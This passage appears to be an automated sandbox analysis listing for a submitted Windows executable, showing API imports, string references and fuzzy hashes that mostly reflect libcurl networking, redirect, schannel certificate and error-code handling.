                                    • inet_pton.WS2_32(00000017,?,?), ref: 00E1E0C2
                                    • inet_pton.WS2_32(00000002,?,?), ref: 00E1E0EB
                                    • htons.WS2_32(?), ref: 00E1E100
                                    • htons.WS2_32(?), ref: 00E1E136
                                    • htons.WS2_32(?), ref: 00E1E18A
                                    • bind.WS2_32(?,?,?), ref: 00E1E1A5
                                    • getsockname.WS2_32(?,?,?), ref: 00E1E1E0
                                    • WSAGetLastError.WS2_32 ref: 00E1E1EA
                                    • WSAGetLastError.WS2_32 ref: 00E1E21C
                                    Strings
                                    • Couldn't bind to interface '%s', xrefs: 00E1DFAB
                                    • host!, xrefs: 00E1DFC4
                                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 00E1E07D
                                    • Bind to local port %hu failed, trying next, xrefs: 00E1E177
                                    • bind failed with errno %d: %s, xrefs: 00E1E23B
                                    • Couldn't bind to '%s', xrefs: 00E1E119
                                    • Local port: %hu, xrefs: 00E1E246
                                    • if!, xrefs: 00E1DF95
                                    • getsockname() failed with errno %d: %s, xrefs: 00E1E209
                                    Similarity
                                    • API ID: htons$ErrorLastinet_ptonstrncmp$bindgetsockname
                                    • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
                                    • API String ID: 2929934046-1901189404
                                    • Opcode ID: b3a3ba6baff0df3a60bf7d37d433f92b939717e87184cd6218b8fbfe6c0a4dd4
                                    • Instruction ID: 83fc7d6db2713e8335a033766370418b68e8dc1f5b0996a096471cfdd722d291
                                    • Opcode Fuzzy Hash: b3a3ba6baff0df3a60bf7d37d433f92b939717e87184cd6218b8fbfe6c0a4dd4
                                    • Instruction Fuzzy Hash: 45A10575A05228AFDB249B24EC59BFA77B8AF09304F145095F84DF7281EB709EC4CB91
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C286
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C446
                                    • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00E2C453
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C46D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C4EB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C508
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C527
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C590
                                    Similarity
                                    • API ID: free$atoi
                                    • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s
                                    • API String ID: 2493182076-1748258277
                                    • Opcode ID: b67bb2129305673ba5467a772db502592da221870e7483b8097aa3278aba9085
                                    • Instruction ID: e98c7efb01f27881843cdc9281cd98d91a612272a73469dd1810ac74e5f51352
                                    • Opcode Fuzzy Hash: b67bb2129305673ba5467a772db502592da221870e7483b8097aa3278aba9085
                                    • Instruction Fuzzy Hash: C2D15832B44626AFDB28DB74FC817BEB7A4FF45314F34652AE415B3281CB60AC408B90
                                    APIs
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00E469C9
                                    • htonl.WS2_32(7F000001), ref: 00E469F0
                                    • setsockopt.WS2_32(00000000,0000FFFF,00000004,?,00000004), ref: 00E46A12
                                    • bind.WS2_32(00000000,?,00000010), ref: 00E46A27
                                    • getsockname.WS2_32(00000000,?,00000010), ref: 00E46A3E
                                    • listen.WS2_32(00000000,00000001), ref: 00E46A59
                                    • socket.WS2_32(00000002,00000001,00000000), ref: 00E46A6F
                                    • connect.WS2_32(00000000,?,00000010), ref: 00E46A86
                                    • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00E46AA5
                                    • accept.WS2_32(00000000,00000000,00000000), ref: 00E46AD6
                                    • getsockname.WS2_32(?,?,00000010), ref: 00E46AF4
                                    • getpeername.WS2_32(?,?,00000010), ref: 00E46B14
                                    • closesocket.WS2_32(00000000), ref: 00E46B41
                                    • closesocket.WS2_32(00000000), ref: 00E46B4C
                                    • closesocket.WS2_32(?), ref: 00E46B54
                                    • closesocket.WS2_32(?), ref: 00E46B5D
                                    Similarity
                                    • API ID: closesocket$getsocknamesocket$acceptbindconnectgetpeernamehtonlioctlsocketlistensetsockopt
                                    • String ID:
                                    • API String ID: 2616969812-0
                                    • Opcode ID: a513652e704dd56b2784afe4283c2834dece6a1ca614b9e35302a9d867012f1a
                                    • Instruction ID: 5899f3e42e1d40c528cb81ac4c3bf8aaf7a2fc33c9436250733558b076b62e77
                                    • Opcode Fuzzy Hash: a513652e704dd56b2784afe4283c2834dece6a1ca614b9e35302a9d867012f1a
                                    • Instruction Fuzzy Hash: 22516F72900609AFDB109FA1EC99BEEBBB9FF09311F605825F601F6190D7709988CB65
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB20
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB42
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB9C
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E4CD4F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D01D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D033
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchrcallocmallocrealloc
                                    • String ID: 0123456789-$<DIR>$APM0123456789:$rwx-tTsS$total
                                    • API String ID: 1091099985-2767756851
                                    • Opcode ID: e049ca0c3de5785565f7a18eb17c97eb502699a8e46584eee14a6986abc77413
                                    • Instruction ID: 190cedfe1f63c7895a311a28282c16b0fa02f37bf2e9ea01d0a826908867e4a8
                                    • Opcode Fuzzy Hash: e049ca0c3de5785565f7a18eb17c97eb502699a8e46584eee14a6986abc77413
                                    • Instruction Fuzzy Hash: 1122EF70A09B029FD768CF29E944B61BBF1FF84318F24961AD056A7B91D735F890CB81
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,766B1980,00000001), ref: 00E1461F
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1462A
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E1463A
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E14645
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E14650
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1465D
                                    Similarity
                                    • API ID: _errno$strtol
                                    • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$0kv@qv@/lv$@#$GMT$\#
                                    • API String ID: 3596500743-2521924296
                                    • Opcode ID: cb741611df9a1dc37f452061bc6c6355bb50552c919d0cffe6dc3444d6c26e86
                                    • Instruction ID: 56a4f97e76f223e8354d5bc59db3eab2db8a99d3e6c3b5516caafc760bc0084b
                                    • Opcode Fuzzy Hash: cb741611df9a1dc37f452061bc6c6355bb50552c919d0cffe6dc3444d6c26e86
                                    • Instruction Fuzzy Hash: C4D16CB1E002199FCB14CFB9D8845EDB7F6AB49328F24662AE525F73D0E7309D818B50
                                    APIs
                                    • CryptQueryObject.CRYPT32(00000002,?,00000002,0000000E,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00E4ECEF
                                    • CertAddCertificateContextToStore.CRYPT32(?,?,00000004,00000000), ref: 00E4ED23
                                    • CertFreeCertificateContext.CRYPT32(?), ref: 00E4ED31
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4ED54
                                    Strings
                                    • schannel: did not add any certificates from CA file '%s', xrefs: 00E4EDCF
                                    • schannel: failed to extract certificate from CA file '%s': %s, xrefs: 00E4ED96
                                    • schannel: added %d certificate(s) from CA file '%s', xrefs: 00E4EDE5
                                    • schannel: unexpected content type '%d' when extracting certificate from CA file '%s', xrefs: 00E4ED78
                                    • -----END CERTIFICATE-----, xrefs: 00E4EC96
                                    • schannel: failed to add certificate from CA file '%s' to certificate store: %s, xrefs: 00E4ED6A
                                    • schannel: CA file '%s' is not correctly formatted, xrefs: 00E4EDAC
                                    • -----BEGIN CERTIFICATE-----, xrefs: 00E4EC65
                                    Similarity
                                    • API ID: CertCertificateContext$CryptErrorFreeLastObjectQueryStore
                                    • String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
                                    • API String ID: 854292303-665156428
                                    • Opcode ID: 71f183d8b598a55b4b58cecdbcf9205fb86ac677c61d75379f223ddd65822a21
                                    • Instruction ID: d74572a9d67b5f436e7b8ced534ea321c98d9e722e5d540a17ab4de580b0f6a9
                                    • Opcode Fuzzy Hash: 71f183d8b598a55b4b58cecdbcf9205fb86ac677c61d75379f223ddd65822a21
                                    • Instruction Fuzzy Hash: 7B51C271E4022CAFDB289F25EC56FEABBB5FB49710F0055D9F549B2281DA704E808F90
                                    APIs
                                      • Part of subcall function 00E10B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 00E10B6D
                                      • Part of subcall function 00E10B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E10B74
                                    • CertGetNameStringA.CRYPT32(?,00000006,00010002,00000000,?,000001B8), ref: 00E4F073
                                    Strings
                                    • schannel: Null certificate info., xrefs: 00E4F0BC
                                    • schannel: Not enough memory to list all host names., xrefs: 00E4F1C3
                                    • schannel: CertFindExtension() returned no extension., xrefs: 00E4F0D8
                                    • 2.5.29.17, xrefs: 00E4F0C9, 00E4F0FD
                                    • schannel: CryptDecodeObjectEx() returned no alternate name information., xrefs: 00E4F111
                                    • schannel: Null certificate context., xrefs: 00E4F0A3
                                    • schannel: Empty DNS name., xrefs: 00E4F13E
                                    Similarity
                                    • API ID: AddressCertHandleModuleNameProcString
                                    • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.
                                    • API String ID: 4138448956-2160583098
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                    • API String ID: 3732870572-2102732564
                                    Strings
                                    • Server doesn't support multiplex (yet), xrefs: 00E226D2
                                    • Could multiplex, but not asked to, xrefs: 00E226FA
                                    • can multiplex, xrefs: 00E22675, 00E2267D
                                    • Can not multiplex, even if we wanted to, xrefs: 00E22712
                                    • Multiplexed connection found, xrefs: 00E22DD7
                                    • Server doesn't support multiplex yet, wait, xrefs: 00E226A6
                                    • serially, xrefs: 00E22670
                                    • Connection #%ld isn't open enough, can't reuse, xrefs: 00E227D4
                                    • Found pending candidate for reuse and CURLOPT_PIPEWAIT is set, xrefs: 00E22E09
                                    • Found bundle for host: %p [%s], xrefs: 00E2267F
                                    • Connection #%ld is still name resolving, can't reuse, xrefs: 00E227B4
                                    Similarity
                                    • API ID:
                                    • String ID: Can not multiplex, even if we wanted to$Connection #%ld is still name resolving, can't reuse$Connection #%ld isn't open enough, can't reuse$Could multiplex, but not asked to$Found bundle for host: %p [%s]$Found pending candidate for reuse and CURLOPT_PIPEWAIT is set$Multiplexed connection found$Server doesn't support multiplex (yet)$Server doesn't support multiplex yet, wait$can multiplex$serially
                                    • API String ID: 0-1297456373
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E384DB
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3854E
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E38580
                                    • bind.WS2_32(?,00000030,?), ref: 00E385FC
                                    • WSAGetLastError.WS2_32 ref: 00E38607
                                    Strings
                                    Similarity
                                    • API ID: calloc$ErrorLastbind
                                    • String ID: bind() failed; %s
                                    • API String ID: 2604820300-1141498939
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040), ref: 00E465D2
                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00E465EC
                                    • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00E465FD
                                    • CryptGetHashParam.ADVAPI32(?,00000004,?,00000004,00000000,?,?,00000000), ref: 00E46616
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?,00000000), ref: 00E46633
                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00E46642
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00E46653
                                    Similarity
                                    • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                    • String ID:
                                    • API String ID: 3606780921-0
                                    APIs
                                    • CryptGetHashParam.ADVAPI32(?,00000002,00000000,00000000,00000000,?,00000000,?,?,00E4F8EB,?,?,?,?,00E49C33,00000000), ref: 00E4F879
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000020,00000000,?,?,00E4F8EB,?,?,?,?,00E49C33,00000000,?), ref: 00E4F892
                                    • CryptDestroyHash.ADVAPI32(?,?,?,00E4F8EB,?,?,?,?,00E49C33,00000000,?), ref: 00E4F8A0
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,00E4F8EB,?,?,?,?,00E49C33,00000000,?), ref: 00E4F8AD
                                    Strings
                                    Similarity
                                    • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                    • String ID:
                                    • API String ID: 2110207923-3916222277
                                    APIs
                                    • CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0(00000008,00000000), ref: 00E03148
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E03155
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E0316F
                                    • Module32First.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2(00000000,00000224), ref: 00E0318D
                                    • Module32Next.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2(00000000,00000224), ref: 00E031B2
                                    Similarity
                                    • API ID: Module32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 3822340588-0
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27864
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E278B8
                                    Strings
                                    • -----END PUBLIC KEY-----, xrefs: 00E27839
                                    • -----BEGIN PUBLIC KEY-----, xrefs: 00E27811
                                    Similarity
                                    • API ID: freemalloc
                                    • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----
                                    • API String ID: 3061335427-1157147699
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E51567
                                    • IsDebuggerPresent.KERNEL32 ref: 00E51633
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E51653
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00E5165D
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                    • String ID:
                                    • API String ID: 254469556-0
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: xk
                                    • API String ID: 0-2543109834
                                    APIs
                                    • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 00E4C769
                                    • CryptGetHashParam.ADVAPI32(00000010,00000002,?,00000010,00000000), ref: 00E4C782
                                    • CryptDestroyHash.ADVAPI32(00000010), ref: 00E4C790
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00E4C79D
                                    Similarity
                                    • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                    • String ID:
                                    • API String ID: 2110207923-0
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: Recv failure: %s
                                    • API String ID: 2514157807-4276829032
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 00E46417
                                    • CryptGenRandom.ADVAPI32(?,?,?), ref: 00E46430
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00E46445
                                    Similarity
                                    • API ID: Crypt$Context$AcquireRandomRelease
                                    • String ID:
                                    • API String ID: 1815803762-0
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,00000000,766B0130,?,00E4C800,00000000), ref: 00E4C6F4
                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000004,?,00E4C800,00000000), ref: 00E4C710
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00E4C800,00000000), ref: 00E4C71D
                                    Similarity
                                    • API ID: Crypt$Context$AcquireCreateHashRelease
                                    • String ID:
                                    • API String ID: 4045725610-0
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040,?,?,?,00E4F8CD,?,00000000,?,00000000,?,?,00E49C33), ref: 00E4F834
                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?,?,00E4F8CD,?,00000000,?,00000000,?,?,00E49C33,?), ref: 00E4F84B
                                    Similarity
                                    • API ID: Crypt$AcquireContextCreateHash
                                    • String ID:
                                    • API String ID: 1914063823-0
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E51390
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-0
                                    • Opcode ID: 20c835b01008726be8dd4f640d4220dd8a6d9bc02bc7ad8d559c5722a1c49e11
                                    • Instruction ID: c1aa00a47ff1655348d5559b30ce7718366a493d54eb1501d0571a1f1677c8e7
                                    • Opcode Fuzzy Hash: 20c835b01008726be8dd4f640d4220dd8a6d9bc02bc7ad8d559c5722a1c49e11
                                    • Instruction Fuzzy Hash: D75158B1A002058FDB15CF5AE8917AEBBF1FB48355F1498BAC815FB251E3B49948CF60
                                    APIs
                                    • CryptHashData.ADVAPI32(?,00000000,00E49C33,00000000,?,00E4F8E1,?,?,00E49C33,00000000,?,00000000,?,?,00E49C33,?), ref: 00E4C741
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CryptDataHash
                                    • String ID:
                                    • API String ID: 4245837645-0
                                    • Opcode ID: b0fc5a544a67f241d0388d02f82735fee0c2f6fbff4d75e53ed5b56293fc5d72
                                    • Instruction ID: 63d76d86be6ebdb5016f871731663418724ea7b55885eb2cda971db84eed404d
                                    • Opcode Fuzzy Hash: b0fc5a544a67f241d0388d02f82735fee0c2f6fbff4d75e53ed5b56293fc5d72
                                    • Instruction Fuzzy Hash: 2CC00236140308AFCF015F85DC05E997BAABB08711F448450BA1C5A171C772E5649B84
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000516D0,00E511D5), ref: 00E516C3
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: f36f63b3fe1adebcb3459a4b804fb45c616a2d2ddd6c2ad8fbda6ea3fd6bcbae
                                    • Instruction ID: 4b67eee12c5633e497da22e28d71db6e83dcd7f29e2c28762ec52c762f985200
                                    • Opcode Fuzzy Hash: f36f63b3fe1adebcb3459a4b804fb45c616a2d2ddd6c2ad8fbda6ea3fd6bcbae
                                    • Instruction Fuzzy Hash:
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: ed44505f7259a9837172f65714c887d0f88528556a9373b66b6feb0fea1fd6f8
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: F8113B7B30008143D606CA3DD4B45B79796EAC53AB72C6B7AD8619F644D632DB4D9500
                                    APIs
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000), ref: 00E1A230
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A238
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 00E1A62C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A63C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A64C
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A654
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A65F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLast_errno$strncpy
                                    • String ID: %s (0x%08X)$%s - %s$0kv@qv@/lv$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                    • API String ID: 4135170618-3520528184
                                    • Opcode ID: f89884568bb39a0aec85f0023b59817ae4228140d832c4359b2597c4ab3c0662
                                    • Instruction ID: 60d648e9da84b39dc26ed74123bfb8fb4b3f58fe3e41169ae992a2f5ddfcd069
                                    • Opcode Fuzzy Hash: f89884568bb39a0aec85f0023b59817ae4228140d832c4359b2597c4ab3c0662
                                    • Instruction Fuzzy Hash: EA81FEB178E2C8D78314076C69069FD6556E791388B6C7232B602FFB81D961CEC4B313
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02464
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02472
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0247E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0248A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02496
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E03167), ref: 00E10E2C
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10E41
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024AA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024BE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024CA
